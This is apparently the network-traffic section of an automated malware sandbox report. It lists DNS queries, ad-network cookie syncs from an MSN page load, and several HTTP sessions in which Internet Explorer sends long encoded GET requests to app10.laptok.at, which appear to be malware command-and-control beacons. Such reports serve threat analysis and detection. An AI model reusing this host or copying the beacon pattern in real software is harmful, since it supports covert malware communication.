                                                                                                                                                                                                                                                                                  Oct 7, 2021 15:54:06.186655998 CEST4999880192.168.2.487.106.18.141
                                                                                                                                                                                                                                                                                  Oct 7, 2021 15:54:06.208997965 CEST804999787.106.18.141192.168.2.4
                                                                                                                                                                                                                                                                                  Oct 7, 2021 15:54:06.239257097 CEST804999787.106.18.141192.168.2.4
                                                                                                                                                                                                                                                                                  Oct 7, 2021 15:54:06.239341974 CEST4999780192.168.2.487.106.18.141
                                                                                                                                                                                                                                                                                  Oct 7, 2021 15:54:07.357055902 CEST4999880192.168.2.487.106.18.141
                                                                                                                                                                                                                                                                                  Oct 7, 2021 15:54:07.357180119 CEST4999780192.168.2.487.106.18.141

                                                                                                                                                                                                                                                                                  UDP Packets


                                                                                                                                                                                                                                                                                  DNS Queries

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
Oct 7, 2021 15:51:42.153971910 CEST | 192.168.2.4 | 8.8.8.8 | 0x3d2e | Standard query (0) | www.msn.com | A (IP address) | IN (0x0001)
Oct 7, 2021 15:51:45.878279924 CEST | 192.168.2.4 | 8.8.8.8 | 0x6bbf | Standard query (0) | web.vortex.data.msn.com | A (IP address) | IN (0x0001)
Oct 7, 2021 15:51:46.787461042 CEST | 192.168.2.4 | 8.8.8.8 | 0x19e7 | Standard query (0) | geolocation.onetrust.com | A (IP address) | IN (0x0001)
Oct 7, 2021 15:51:46.959943056 CEST | 192.168.2.4 | 8.8.8.8 | 0xd505 | Standard query (0) | contextual.media.net | A (IP address) | IN (0x0001)
Oct 7, 2021 15:51:48.617886066 CEST | 192.168.2.4 | 8.8.8.8 | 0x44fe | Standard query (0) | btloader.com | A (IP address) | IN (0x0001)
Oct 7, 2021 15:51:51.565850973 CEST | 192.168.2.4 | 8.8.8.8 | 0x8482 | Standard query (0) | lg3.media.net | A (IP address) | IN (0x0001)
Oct 7, 2021 15:51:51.816333055 CEST | 192.168.2.4 | 8.8.8.8 | 0x57b | Standard query (0) | ad.doubleclick.net | A (IP address) | IN (0x0001)
Oct 7, 2021 15:51:51.822688103 CEST | 192.168.2.4 | 8.8.8.8 | 0x2a71 | Standard query (0) | ad-delivery.net | A (IP address) | IN (0x0001)
Oct 7, 2021 15:51:52.451631069 CEST | 192.168.2.4 | 8.8.8.8 | 0xe592 | Standard query (0) | cm.g.doubleclick.net | A (IP address) | IN (0x0001)
Oct 7, 2021 15:51:52.507438898 CEST | 192.168.2.4 | 8.8.8.8 | 0x61a7 | Standard query (0) | x.bidswitch.net | A (IP address) | IN (0x0001)
Oct 7, 2021 15:51:52.651334047 CEST | 192.168.2.4 | 8.8.8.8 | 0x7224 | Standard query (0) | id.rlcdn.com | A (IP address) | IN (0x0001)
Oct 7, 2021 15:51:52.770416975 CEST | 192.168.2.4 | 8.8.8.8 | 0xfc26 | Standard query (0) | cs.media.net | A (IP address) | IN (0x0001)
Oct 7, 2021 15:51:52.778383970 CEST | 192.168.2.4 | 8.8.8.8 | 0xf784 | Standard query (0) | match.adsrvr.org | A (IP address) | IN (0x0001)
Oct 7, 2021 15:51:52.960918903 CEST | 192.168.2.4 | 8.8.8.8 | 0x9c9f | Standard query (0) | rtb.mfadsrvr.com | A (IP address) | IN (0x0001)
Oct 7, 2021 15:51:53.001507998 CEST | 192.168.2.4 | 8.8.8.8 | 0x2c46 | Standard query (0) | hblg.media.net | A (IP address) | IN (0x0001)
Oct 7, 2021 15:51:53.687244892 CEST | 192.168.2.4 | 8.8.8.8 | 0xfe40 | Standard query (0) | pixel.advertising.com | A (IP address) | IN (0x0001)
Oct 7, 2021 15:51:53.890007019 CEST | 192.168.2.4 | 8.8.8.8 | 0x4039 | Standard query (0) | ups.analytics.yahoo.com | A (IP address) | IN (0x0001)
Oct 7, 2021 15:51:53.953255892 CEST | 192.168.2.4 | 8.8.8.8 | 0x9dc8 | Standard query (0) | srtb.msn.com | A (IP address) | IN (0x0001)
Oct 7, 2021 15:51:55.138381958 CEST | 192.168.2.4 | 8.8.8.8 | 0x6323 | Standard query (0) | img.img-taboola.com | A (IP address) | IN (0x0001)
Oct 7, 2021 15:51:56.737637997 CEST | 192.168.2.4 | 8.8.8.8 | 0xc1ae | Standard query (0) | cvision.media.net | A (IP address) | IN (0x0001)
Oct 7, 2021 15:53:08.155821085 CEST | 192.168.2.4 | 8.8.8.8 | 0x7941 | Standard query (0) | app10.laptok.at | A (IP address) | IN (0x0001)
Oct 7, 2021 15:53:29.472192049 CEST | 192.168.2.4 | 8.8.8.8 | 0x41f5 | Standard query (0) | app10.laptok.at | A (IP address) | IN (0x0001)
Oct 7, 2021 15:53:34.481219053 CEST | 192.168.2.4 | 8.8.8.8 | 0xb573 | Standard query (0) | app10.laptok.at | A (IP address) | IN (0x0001)
Oct 7, 2021 15:54:06.077280045 CEST | 192.168.2.4 | 8.8.8.8 | 0xec88 | Standard query (0) | app10.laptok.at | A (IP address) | IN (0x0001)

                                                                                                                                                                                                                                                                                  DNS Answers

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class

                                                                                                                                                                                                                                                                                  HTTP Request Dependency Graph

                                                                                                                                                                                                                                                                                  • https:
                                                                                                                                                                                                                                                                                    • geolocation.onetrust.com
                                                                                                                                                                                                                                                                                    • btloader.com
                                                                                                                                                                                                                                                                                    • ad-delivery.net
                                                                                                                                                                                                                                                                                    • ad.doubleclick.net
                                                                                                                                                                                                                                                                                    • cm.g.doubleclick.net
                                                                                                                                                                                                                                                                                    • x.bidswitch.net
                                                                                                                                                                                                                                                                                    • id.rlcdn.com
                                                                                                                                                                                                                                                                                    • match.adsrvr.org
                                                                                                                                                                                                                                                                                    • rtb.mfadsrvr.com
                                                                                                                                                                                                                                                                                    • pixel.advertising.com
                                                                                                                                                                                                                                                                                    • ups.analytics.yahoo.com
                                                                                                                                                                                                                                                                                    • img.img-taboola.com
                                                                                                                                                                                                                                                                                  • app10.laptok.at

                                                                                                                                                                                                                                                                                  HTTP Packets

| Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
|---|---|---|---|---|---|
| 0 | 192.168.2.4 | 49776 | 104.20.184.68 | 443 | C:\Program Files (x86)\Internet Explorer\iexplore.exe |
| 1 | 192.168.2.4 | 49790 | 104.26.7.139 | 443 | C:\Program Files (x86)\Internet Explorer\iexplore.exe |
| 10 | 192.168.2.4 | 49822 | 18.195.217.206 | 443 | C:\Program Files (x86)\Internet Explorer\iexplore.exe |
| 11 | 192.168.2.4 | 49823 | 18.195.217.206 | 443 | C:\Program Files (x86)\Internet Explorer\iexplore.exe |
| 12 | 192.168.2.4 | 49830 | 18.156.81.187 | 443 | C:\Program Files (x86)\Internet Explorer\iexplore.exe |
| 13 | 192.168.2.4 | 49810 | 142.250.203.98 | 443 | C:\Program Files (x86)\Internet Explorer\iexplore.exe |
| 14 | 192.168.2.4 | 49836 | 18.197.99.6 | 443 | C:\Program Files (x86)\Internet Explorer\iexplore.exe |
| 15 | 192.168.2.4 | 49835 | 18.197.99.6 | 443 | C:\Program Files (x86)\Internet Explorer\iexplore.exe |
| 16 | 192.168.2.4 | 49838 | 18.156.0.31 | 443 | C:\Program Files (x86)\Internet Explorer\iexplore.exe |
| 17 | 192.168.2.4 | 49837 | 18.156.0.31 | 443 | C:\Program Files (x86)\Internet Explorer\iexplore.exe |
| 18 | 192.168.2.4 | 49841 | 18.156.0.31 | 443 | C:\Program Files (x86)\Internet Explorer\iexplore.exe |
| 19 | 192.168.2.4 | 49842 | 18.156.0.31 | 443 | C:\Program Files (x86)\Internet Explorer\iexplore.exe |
| 2 | 192.168.2.4 | 49806 | 172.67.69.19 | 443 | C:\Program Files (x86)\Internet Explorer\iexplore.exe |
| 20 | 192.168.2.4 | 49847 | 151.101.1.44 | 443 | C:\Program Files (x86)\Internet Explorer\iexplore.exe |
| 21 | 192.168.2.4 | 49848 | 151.101.1.44 | 443 | C:\Program Files (x86)\Internet Explorer\iexplore.exe |
| 22 | 192.168.2.4 | 49849 | 151.101.1.44 | 443 | C:\Program Files (x86)\Internet Explorer\iexplore.exe |
| 23 | 192.168.2.4 | 49852 | 151.101.1.44 | 443 | C:\Program Files (x86)\Internet Explorer\iexplore.exe |
| 24 | 192.168.2.4 | 49851 | 151.101.1.44 | 443 | C:\Program Files (x86)\Internet Explorer\iexplore.exe |
| 25 | 192.168.2.4 | 49850 | 151.101.1.44 | 443 | C:\Program Files (x86)\Internet Explorer\iexplore.exe |


| Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
|---|---|---|---|---|---|
| 26 | 192.168.2.4 | 49936 | 87.106.18.141 | 80 | C:\Program Files (x86)\Internet Explorer\iexplore.exe |

Timestamp | kBytes transferred | Direction | Data

Oct 7, 2021 15:53:08.238802910 CEST | 9025 | OUT | GET /iyCuS9ekK6/ZKYlS2pL4_2F6YN5g/m2OzU2ez_2Fk/8F_2BnXwn7_/2BP90eUCGBXbRD/RIrhhRbIti7z5YuR4sWSi/epontKgntd3dejbE/4HUFCBnhPXzMXu2/uZ4C1mmtL8vyVF2uY5/jVMd1l3Jh/x4JupkgAYc9HSuaowzvE/VVWENV7cepnquu_2Fad/hpeYK_2BWzJKa_2BOghWOX/oxGEacWNQdGQC/A6Cks_2F/uCy09i_2F1Tm3pYwDufmBHp/hIUmxpzNN2/hckwDljGIXjYYf_2F/CNoayANu_2Bs/LgXcLBGeCG9/yBRWVpnUTSUqib2fLN/OUCgu HTTP/1.1
Accept: text/html, application/xhtml+xml, image/jxr, */*
Accept-Language: en-US
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept-Encoding: gzip, deflate
Host: app10.laptok.at
Connection: Keep-Alive

Oct 7, 2021 15:53:08.308232069 CEST | 9025 | IN | HTTP/1.1 200 OK
Server: nginx/1.14.2
Date: Thu, 07 Oct 2021 13:53:08 GMT
Content-Type: text/plain
Transfer-Encoding: chunked
Connection: keep-alive
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0

Oct 7, 2021 15:53:08.582734108 CEST | 9034 | OUT | GET /favicon.ico HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: app10.laptok.at
Connection: Keep-Alive

Oct 7, 2021 15:53:08.630127907 CEST | 9034 | IN | HTTP/1.1 200 OK
Server: nginx/1.14.2
Date: Thu, 07 Oct 2021 13:53:08 GMT
Content-Type: text/plain
Transfer-Encoding: chunked
Connection: keep-alive
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
27 | 192.168.2.4 | 49961 | 87.106.18.141 | 80 | C:\Program Files (x86)\Internet Explorer\iexplore.exe

Timestamp | kBytes transferred | Direction | Data
Oct 7, 2021 15:53:29.599540949 CEST | 14564 | OUT | GET /PdcGcGQosorY2QVhs_2/Bq9ScRQL0MmNo2gJrOrbiG/FDPb27Vu9hQGu/uY_2BMGI/NhNPnwzZnvYmoE7OGPBLQde/_2BY7mjJDF/ENcdEwVrEZJmnckQF/xH_2FgB8NMkY/CX5URbB5Mx9/tUnqO1qk0bc_2F/PzDjrCOWN7DecUA5P73Ps/FXVrTQO1zHZWe16C/R7nFvrjBN_2FbS0/Sy3O7HQGtcelrr3wGg/pY1rVDRtB/mUtxf1LfEhQfplP_2BGc/zeFFWNWagrH7B9kDL9x/Qcq2Cq8xJzMSz1YJbgWaq6/2niybL0WpOiiM/8AGzUeTW/_2FJcei9yt9KTfGqe2YPREu/h11 HTTP/1.1
Accept: text/html, application/xhtml+xml, image/jxr, */*
Accept-Language: en-US
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept-Encoding: gzip, deflate
Host: app10.laptok.at
Connection: Keep-Alive
Oct 7, 2021 15:53:29.647164106 CEST | 14565 | IN | HTTP/1.1 200 OK
Server: nginx/1.14.2
Date: Thu, 07 Oct 2021 13:53:29 GMT
Content-Type: text/plain
Transfer-Encoding: chunked
Connection: keep-alive
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0
Oct 7, 2021 15:53:29.942718029 CEST | 14566 | OUT | GET /favicon.ico HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: app10.laptok.at
Connection: Keep-Alive
Oct 7, 2021 15:53:29.992330074 CEST | 14566 | IN | HTTP/1.1 200 OK
Server: nginx/1.14.2
Date: Thu, 07 Oct 2021 13:53:29 GMT
Content-Type: text/plain
Transfer-Encoding: chunked
Connection: keep-alive
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
28 | 192.168.2.4 | 49965 | 87.106.18.141 | 80 | C:\Program Files (x86)\Internet Explorer\iexplore.exe

Timestamp | kBytes transferred | Direction | Data
Oct 7, 2021 15:53:34.574084044 CEST | 15196 | OUT | GET /KiETfhAdcEl7/hLoS0_2BEdS/nu4Yf9GnANVyXk/YgUltJ7zs6xEJ2nloxeBs/eATUXgJAO922GcgP/GiUgV17y_2BdX4O/qFWwhpMGMf37wi_2BX/lkJe3cdrN/7WVmaELlUteTQIErFhWc/URRkn6I1CeKadfr0Tg_/2BWPYNHHR_2F2UImJAlhjY/i7YonJ3Ydwnd_/2BgOgiB9/MYuujPMMxg18nymjpE2JqFD/0fVq8D9YsD/phg5UsKLZOQl7kqi1/VTS_2FsAFu3G/3TrEzzwsBKW/3MeaiWTLCHCZlD/OY9S51u3L9nBtrZ_2BZx7/0yqRxDj4x6MboGVE/Q0bFKfsJ98F/gfX HTTP/1.1
Accept: text/html, application/xhtml+xml, image/jxr, */*
Accept-Language: en-US
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept-Encoding: gzip, deflate
Host: app10.laptok.at
Connection: Keep-Alive
Oct 7, 2021 15:53:34.620594978 CEST | 15196 | IN | HTTP/1.1 200 OK
Server: nginx/1.14.2
Date: Thu, 07 Oct 2021 13:53:34 GMT
Content-Type: text/plain
Transfer-Encoding: chunked
Connection: keep-alive
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
29 | 192.168.2.4 | 49997 | 87.106.18.141 | 80 | C:\Program Files (x86)\Internet Explorer\iexplore.exe

Timestamp | kBytes transferred | Direction | Data
Oct 7, 2021 15:54:06.183676004 CEST | 16155 | OUT | GET /tej6GHOV/2OZDNZM15j8d4LuzyBm1CPL/pFWNHMsgBq/Me_2BiCKfGmnsgtGg/Rke8C0lda6PN/mYOR8uYOgwt/6eDC9ufg4E5RLJ/VOnxrPlZG6FiNtHGLC5WH/SdTzqrBTR2p_2Fsz/3qaz2VU319DSvXM/bXNaVzi_2BhoNpjBto/CdRkBvfA0/fgYhpjExPXJDXoMrOLKj/_2BnxOA04HyPM26GFwn/mFc4so9IwBrMFkh7WH8no2/C7B38PnerqkdM/EgzIMhoK/Lnz3duCdEuM_2FN4IA_2F8v/u68N1tKS6F/4NEjvBzDbxJ7ghRIM/SCFXI7ZJd_2B/V2Z4tsab_2F/VPR0GKd HTTP/1.1
Accept: text/html, application/xhtml+xml, image/jxr, */*
Accept-Language: en-US
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept-Encoding: gzip, deflate
Host: app10.laptok.at
Connection: Keep-Alive
Oct 7, 2021 15:54:06.239257097 CEST | 16155 | IN | HTTP/1.1 200 OK
Server: nginx/1.14.2
Date: Thu, 07 Oct 2021 13:54:06 GMT
Content-Type: text/plain
Transfer-Encoding: chunked
Connection: keep-alive
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
3 | 192.168.2.4 | 49804 | 172.217.168.38 | 443 | C:\Program Files (x86)\Internet Explorer\iexplore.exe

Timestamp | kBytes transferred | Direction | Data


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
4 | 192.168.2.4 | 49811 | 142.250.203.98 | 443 | C:\Program Files (x86)\Internet Explorer\iexplore.exe

Timestamp | kBytes transferred | Direction | Data


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
5 | 192.168.2.4 | 49813 | 18.156.81.187 | 443 | C:\Program Files (x86)\Internet Explorer\iexplore.exe

Timestamp | kBytes transferred | Direction | Data


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
6 | 192.168.2.4 | 49812 | 18.156.81.187 | 443 | C:\Program Files (x86)\Internet Explorer\iexplore.exe

Timestamp | kBytes transferred | Direction | Data


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
7 | 192.168.2.4 | 49815 | 35.244.174.68 | 443 | C:\Program Files (x86)\Internet Explorer\iexplore.exe

Timestamp | kBytes transferred | Direction | Data


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
8 | 192.168.2.4 | 49820 | 76.223.111.131 | 443 | C:\Program Files (x86)\Internet Explorer\iexplore.exe

Timestamp | kBytes transferred | Direction | Data


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
9 | 192.168.2.4 | 49819 | 76.223.111.131 | 443 | C:\Program Files (x86)\Internet Explorer\iexplore.exe

Timestamp | kBytes transferred | Direction | Data


HTTPS Proxied Packets

Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
0 | 192.168.2.4 | 49776 | 104.20.184.68 | 443 | C:\Program Files (x86)\Internet Explorer\iexplore.exe
Timestamp | kBytes transferred | Direction | Data
2021-10-07 13:51:46 UTC | 0 | OUT | GET /cookieconsentpub/v1/geo/location HTTP/1.1
Accept: application/javascript, */*;q=0.8
Referer: https://www.msn.com/de-ch/?ocid=iehp
Accept-Language: en-US
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept-Encoding: gzip, deflate
Host: geolocation.onetrust.com
Connection: Keep-Alive
2021-10-07 13:51:46 UTC | 0 | IN | HTTP/1.1 200 OK
Date: Thu, 07 Oct 2021 13:51:46 GMT
Content-Type: text/javascript
Content-Length: 182
Connection: close
Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Server: cloudflare
CF-RAY: 69a79b2e0cec4a7a-FRA
2021-10-07 13:51:46 UTC | 0 | IN | Data Ascii: jsonFeed({"country":"CH","state":"ZG","stateName":"Zug","zipcode":"6331","timezone":"Europe/Zurich","latitude":"47.19370","longitude":"8.42020","city":"Hunenberg","continent":"EU"});


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
1 | 192.168.2.4 | 49790 | 104.26.7.139 | 443 | C:\Program Files (x86)\Internet Explorer\iexplore.exe
Timestamp | kBytes transferred | Direction | Data
2021-10-07 13:51:49 UTC | 0 | OUT | GET /tag?o=6208086025961472&upapi=true HTTP/1.1
Accept: application/javascript, */*;q=0.8
Referer: https://www.msn.com/de-ch/?ocid=iehp
Accept-Language: en-US
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept-Encoding: gzip, deflate
Host: btloader.com
Connection: Keep-Alive
2021-10-07 13:51:49 UTC | 1 | IN | HTTP/1.1 200 OK
Date: Thu, 07 Oct 2021 13:51:49 GMT
Content-Type: application/javascript
Content-Length: 10157
Connection: close
Access-Control-Allow-Origin: *
Cache-Control: public, max-age=1800, must-revalidate
Etag: "643eb1aad6ba3932ca744b96ffc00048"
Vary: Origin
Via: 1.1 google
CF-Cache-Status: HIT
Age: 3398
Accept-Ranges: bytes
Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=mbF%2F23%2FgtoSelwrfoG6QhQ0%2FYIaW2DCm1OFnrzBaHLLEfu4qc3p5PY5WUq%2FvSfOTOtZQPghKEZu4iVdCHI26wfxNDJX995dWeKNnDsCpIclhDUt77a429bDTX2VCgg%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 69a79b3d5cbc05c4-FRA


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
10 | 192.168.2.4 | 49822 | 18.195.217.206 | 443 | C:\Program Files (x86)\Internet Explorer\iexplore.exe
Timestamp | kBytes transferred | Direction | Data
2021-10-07 13:51:53 UTC | 23 | OUT | GET /sync?ssp=bidswitch&bidswitch_ssp_id=medianet&bsw_user_id=ed0d0c9d-eb5e-460c-94bd-331d1d38e375 HTTP/1.1
Accept: image/png, image/svg+xml, image/jxr, image/*;q=0.8, */*;q=0.5
Referer: https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2C117%2C184%2C188%2C203%2C226%2C246%2C2030%2C2033%2C3018&itype=HB-CM&rtime=4&https=1&usp_status=0&usp_consent=1&dcfp=gdpr,usp
Accept-Language: en-US
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept-Encoding: gzip, deflate
Connection: Keep-Alive
Host: rtb.mfadsrvr.com
2021-10-07 13:51:53 UTC | 24 | IN | HTTP/1.1 302 Moved Temporarily
Cache-Control: no-cache, no-store, must-revalidate
                                                                                                                                                                                                                                                                                  Date: Thu, 07 Oct 2021 13:51:53 GMT
                                                                                                                                                                                                                                                                                  Location: https://rtb.mfadsrvr.com/ul_cb/sync?ssp=bidswitch&bidswitch_ssp_id=medianet&bsw_user_id=ed0d0c9d-eb5e-460c-94bd-331d1d38e375
                                                                                                                                                                                                                                                                                  Set-Cookie: tuuid=8a6d375f-4587-406a-a533-3504255f4e66; path=/; expires=Sat, 07-Oct-2023 13:51:53 GMT; domain=.mfadsrvr.com
                                                                                                                                                                                                                                                                                  Set-Cookie: c=1633614713; path=/; expires=Sat, 07-Oct-2023 13:51:53 GMT; domain=.mfadsrvr.com
                                                                                                                                                                                                                                                                                  Set-Cookie: tuuid_lu=1633614713; path=/; expires=Sat, 07-Oct-2023 13:51:53 GMT; domain=.mfadsrvr.com
                                                                                                                                                                                                                                                                                  Content-Length: 0
                                                                                                                                                                                                                                                                                  Connection: Close


Session ID: 11, Source IP: 192.168.2.4, Source Port: 49823, Destination IP: 18.195.217.206, Destination Port: 443, Process: C:\Program Files (x86)\Internet Explorer\iexplore.exe
Timestamp: 2021-10-07 13:51:53 UTC, kBytes transferred: 25, Direction: OUT, Data:
GET /ul_cb/sync?ssp=bidswitch&bidswitch_ssp_id=medianet&bsw_user_id=ed0d0c9d-eb5e-460c-94bd-331d1d38e375 HTTP/1.1
Accept: image/png, image/svg+xml, image/jxr, image/*;q=0.8, */*;q=0.5
Referer: https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2C117%2C184%2C188%2C203%2C226%2C246%2C2030%2C2033%2C3018&itype=HB-CM&rtime=4&https=1&usp_status=0&usp_consent=1&dcfp=gdpr,usp
Accept-Language: en-US
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept-Encoding: gzip, deflate
Connection: Keep-Alive
Host: rtb.mfadsrvr.com
Cookie: tuuid=8a6d375f-4587-406a-a533-3504255f4e66; c=1633614713; tuuid_lu=1633614713
Timestamp: 2021-10-07 13:51:53 UTC, kBytes transferred: 25, Direction: IN, Data:
HTTP/1.1 302 Moved Temporarily
Cache-Control: no-cache, no-store, must-revalidate
Date: Thu, 07 Oct 2021 13:51:53 GMT
Location: //x.bidswitch.net/sync?dsp_id=250&expires=14&user_id=8a6d375f-4587-406a-a533-3504255f4e66&ssp=medianet
Set-Cookie: tuuid=8a6d375f-4587-406a-a533-3504255f4e66; path=/; expires=Sat, 07-Oct-2023 13:51:53 GMT; domain=.mfadsrvr.com
Set-Cookie: tuuid_lu=1633614713; path=/; expires=Sat, 07-Oct-2023 13:51:53 GMT; domain=.mfadsrvr.com
Set-Cookie: bsw_uid=ed0d0c9d-eb5e-460c-94bd-331d1d38e375; path=/; expires=Sat, 07-Oct-2023 13:51:53 GMT; domain=.mfadsrvr.com
Set-Cookie: ssh=!bidswitch,1633614713; path=/; expires=Sat, 07-Oct-2023 13:51:53 GMT; domain=.mfadsrvr.com
Content-Length: 0
Connection: Close


Session ID: 12, Source IP: 192.168.2.4, Source Port: 49830, Destination IP: 18.156.81.187, Destination Port: 443, Process: C:\Program Files (x86)\Internet Explorer\iexplore.exe
Timestamp: 2021-10-07 13:51:53 UTC, kBytes transferred: 26, Direction: OUT, Data:
GET /sync?dsp_id=250&expires=14&user_id=8a6d375f-4587-406a-a533-3504255f4e66&ssp=medianet HTTP/1.1
Accept: image/png, image/svg+xml, image/jxr, image/*;q=0.8, */*;q=0.5
Referer: https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2C117%2C184%2C188%2C203%2C226%2C246%2C2030%2C2033%2C3018&itype=HB-CM&rtime=4&https=1&usp_status=0&usp_consent=1&dcfp=gdpr,usp
Accept-Language: en-US
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept-Encoding: gzip, deflate
Connection: Keep-Alive
Host: x.bidswitch.net
Cookie: tuuid=ed0d0c9d-eb5e-460c-94bd-331d1d38e375; c=1633614712; tuuid_lu=1633614712
Timestamp: 2021-10-07 13:51:53 UTC, kBytes transferred: 27, Direction: IN, Data:
HTTP/1.1 302 Moved Temporarily
Cache-Control: no-cache, no-store, must-revalidate
Date: Thu, 07 Oct 2021 13:51:53 GMT
Location: //contextual.media.net/cksync.php?cs=1&type=bs&ovsid=ed0d0c9d-eb5e-460c-94bd-331d1d38e375&gdpr=&gdpr_consent=&gdpr_pd=
Set-Cookie: cs=; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT; domain=.bidswitch.net; samesite=none; secure
Set-Cookie: bsw_origin_init=; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT; domain=.bidswitch.net; samesite=none; secure
Content-Length: 0
Connection: Close


Session ID: 13, Source IP: 192.168.2.4, Source Port: 49810, Destination IP: 142.250.203.98, Destination Port: 443, Process: C:\Program Files (x86)\Internet Explorer\iexplore.exe
Timestamp: 2021-10-07 13:51:53 UTC, kBytes transferred: 27, Direction: OUT, Data:
GET /pixel?cs=1&google_nid=media&google_cm=1&google_hm=Mjc2NjE2MzEyNjY4NDEzODAwMFYxMA%3D%3D&google_sc=1 HTTP/1.1
Accept: image/png, image/svg+xml, image/jxr, image/*;q=0.8, */*;q=0.5
Referer: https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2C117%2C184%2C188%2C203%2C226%2C246%2C2030%2C2033%2C3018&itype=HB-CM&rtime=57&https=1&usp_status=0&usp_consent=1&dcfp=gdpr,usp
Accept-Language: en-US
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept-Encoding: gzip, deflate
Host: cm.g.doubleclick.net
Connection: Keep-Alive
Cookie: IDE=AHWqTUlHPkNa6plymW9JTgSNVG2qEeIJ_G_IptnSH_2mFtME07xAKM_VEZoF-OQ-Uys
Timestamp: 2021-10-07 13:51:53 UTC, kBytes transferred: 28, Direction: IN, Data:
HTTP/1.1 302 Found
P3P: policyref="https://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Location: https://cs.media.net/cksync?type=g&cs=1&google_gid=CAESENlypXSQarzyPfZadJregtU&google_cver=1
Date: Thu, 07 Oct 2021 13:51:53 GMT
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Cache-Control: no-cache, must-revalidate
Cross-Origin-Resource-Policy: cross-origin
Content-Type: text/html; charset=UTF-8
Server: HTTP server (unknown)
Content-Length: 301
X-XSS-Protection: 0
Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-T051=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
Connection: close
Timestamp: 2021-10-07 13:51:53 UTC, kBytes transferred: 29, Direction: IN, Data:
